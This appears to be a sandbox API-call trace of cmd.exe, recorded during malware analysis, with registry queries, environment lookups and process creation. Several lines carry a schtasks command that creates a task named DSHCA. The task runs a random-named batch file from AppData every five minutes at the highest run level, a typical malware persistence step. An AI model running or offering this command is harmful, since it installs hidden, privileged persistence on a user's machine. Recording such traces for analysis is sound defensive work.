lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1bea84 | out: phkResult=0x1bea84*=0x94) returned 0x0 [0284.962] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x0, lpData=0x1bea90*=0xe0, lpcbData=0x1bea8c*=0x1000) returned 0x2 [0284.962] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x4, lpData=0x1bea90*=0x1, lpcbData=0x1bea8c*=0x4) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x0, lpData=0x1bea90*=0x1, lpcbData=0x1bea8c*=0x1000) returned 0x2 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x4, lpData=0x1bea90*=0x0, lpcbData=0x1bea8c*=0x4) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x4, lpData=0x1bea90*=0x40, lpcbData=0x1bea8c*=0x4) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x4, lpData=0x1bea90*=0x40, lpcbData=0x1bea8c*=0x4) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x0, lpData=0x1bea90*=0x40, lpcbData=0x1bea8c*=0x1000) returned 0x2 [0284.963] RegCloseKey (hKey=0x94) returned 0x0 [0284.963] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1bea84 | out: phkResult=0x1bea84*=0x94) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x0, lpData=0x1bea90*=0x40, lpcbData=0x1bea8c*=0x1000) returned 0x2 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x4, lpData=0x1bea90*=0x1, lpcbData=0x1bea8c*=0x4) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x0, lpData=0x1bea90*=0x1, lpcbData=0x1bea8c*=0x1000) returned 0x2 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x4, lpData=0x1bea90*=0x0, lpcbData=0x1bea8c*=0x4) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x4, lpData=0x1bea90*=0x9, lpcbData=0x1bea8c*=0x4) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x4, lpData=0x1bea90*=0x9, lpcbData=0x1bea8c*=0x4) returned 0x0 [0284.963] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1bea88, lpData=0x1bea90, lpcbData=0x1bea8c*=0x1000 | out: lpType=0x1bea88*=0x0, lpData=0x1bea90*=0x9, lpcbData=0x1bea8c*=0x1000) returned 0x2 [0284.963] RegCloseKey (hKey=0x94) returned 0x0 [0284.963] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432a5 [0284.963] srand (_Seed=0x5bb432a5) [0284.963] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /tn DSHCA /tr \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\" /sc minute /mo 5 /RL HIGHEST /F" [0284.963] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /tn DSHCA /tr \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\" /sc minute /mo 5 /RL HIGHEST /F" [0284.963] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.964] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c7f98, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0284.964] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0284.964] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0284.964] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0284.964] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0284.964] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0284.964] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0284.964] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0284.964] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0284.964] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0284.964] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0284.964] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0284.964] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0284.964] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0284.964] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1bf85c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.964] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x1bf85c, lpFilePart=0x1bf854 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x1bf854*="Desktop") returned 0x1d [0284.964] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0285.141] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1bf5d8 | out: lpFindFileData=0x1bf5d8) returned 0x2c81a8 [0285.141] FindClose (in: hFindFile=0x2c81a8 | out: hFindFile=0x2c81a8) returned 1 [0285.141] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x1bf5d8 | out: lpFindFileData=0x1bf5d8) returned 0x2c81a8 [0285.141] FindClose (in: hFindFile=0x2c81a8 | out: hFindFile=0x2c81a8) returned 1 [0285.141] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0285.141] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x1bf5d8 | out: lpFindFileData=0x1bf5d8) returned 0x2c81a8 [0285.141] FindClose (in: hFindFile=0x2c81a8 | out: hFindFile=0x2c81a8) returned 1 [0285.141] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0285.141] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0285.142] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0285.142] GetEnvironmentStringsW () returned 0x2ca000* [0285.142] FreeEnvironmentStringsA (penv="=") returned 1 [0285.142] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0285.143] GetConsoleOutputCP () returned 0x1b5 [0285.354] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0285.354] GetUserDefaultLCID () returned 0x409 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1bf98c, cchData=128 | out: lpLCData="0") returned 2 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1bf98c, cchData=128 | out: lpLCData="0") returned 2 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1bf98c, cchData=128 | out: lpLCData="1") returned 2 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0285.354] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0285.354] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0285.356] GetConsoleTitleW (in: lpConsoleTitle=0x2c8d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0285.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0285.458] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0285.458] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0285.458] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0285.459] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0285.459] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0285.459] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0285.459] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0285.459] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0285.459] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0285.459] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0285.461] GetConsoleTitleW (in: lpConsoleTitle=0x1bf678, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0285.464] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0285.464] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0285.464] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0285.464] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0285.464] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0285.464] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0285.464] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0285.464] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0285.464] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0285.464] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0285.464] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0285.464] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0285.464] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0285.464] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0285.464] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0285.464] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0285.464] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0285.464] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0285.464] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0285.464] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0285.464] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0285.464] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0285.464] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0285.465] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0285.465] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0285.465] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0285.465] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0285.465] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0285.465] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0285.465] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0285.465] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0285.465] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0285.465] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0285.465] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0285.465] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0285.465] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0285.465] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0285.465] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0285.465] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0285.465] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0285.465] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0285.465] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0285.465] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0285.465] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0285.465] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0285.465] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0285.465] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0285.465] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0285.465] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0285.465] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0285.465] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0285.465] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0285.465] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0285.465] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0285.465] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0285.465] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0285.465] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0285.465] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0285.465] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0285.465] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0285.465] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0285.465] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0285.465] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0285.465] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0285.465] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0285.465] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0285.465] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0285.465] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0285.465] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0285.465] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0285.466] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0285.466] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0285.466] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0285.466] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0285.466] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0285.466] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0285.466] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0285.466] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0285.466] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0285.466] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0285.466] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0285.466] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0285.466] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0285.466] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0285.466] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0285.466] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0285.466] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0285.466] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0285.467] SetErrorMode (uMode=0x0) returned 0x0 [0285.467] SetErrorMode (uMode=0x1) returned 0x0 [0285.467] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2ca008, lpFilePart=0x1bf184 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x1bf184*="Desktop") returned 0x1d [0285.467] SetErrorMode (uMode=0x0) returned 0x1 [0285.467] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0285.467] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0285.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0285.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.473] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x1bef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bef10) returned 0xffffffff [0285.473] GetLastError () returned 0x2 [0285.473] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.473] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x1bef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bef10) returned 0xffffffff [0285.473] GetLastError () returned 0x2 [0285.473] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x1bef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bef10) returned 0x2c9498 [0285.473] FindClose (in: hFindFile=0x2c9498 | out: hFindFile=0x2c9498) returned 1 [0285.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x1bef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bef10) returned 0xffffffff [0285.473] GetLastError () returned 0x2 [0285.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x1bef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bef10) returned 0x2c9498 [0285.473] FindClose (in: hFindFile=0x2c9498 | out: hFindFile=0x2c9498) returned 1 [0285.474] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0285.474] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0285.474] GetConsoleTitleW (in: lpConsoleTitle=0x1bf404, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0285.480] InitializeProcThreadAttributeList (in: lpAttributeList=0x1bf330, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1bf314 | out: lpAttributeList=0x1bf330, lpSize=0x1bf314) returned 1 [0285.480] UpdateProcThreadAttribute (in: lpAttributeList=0x1bf330, dwFlags=0x0, Attribute=0x60001, lpValue=0x1bf31c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1bf330, lpPreviousValue=0x0) returned 1 [0285.480] GetStartupInfoW (in: lpStartupInfo=0x1bf368 | out: lpStartupInfo=0x1bf368*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0285.480] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0285.481] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0285.481] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0285.482] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Create /tn DSHCA /tr \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\" /sc minute /mo 5 /RL HIGHEST /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x1bf2b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /Create /tn DSHCA /tr \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\" /sc minute /mo 5 /RL HIGHEST /F", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1bf304 | out: lpCommandLine="schtasks /Create /tn DSHCA /tr \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\" /sc minute /mo 5 /RL HIGHEST /F", lpProcessInformation=0x1bf304*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x96c, dwThreadId=0xea8)) returned 1 [0285.602] CloseHandle (hObject=0xa4) returned 1 [0285.602] 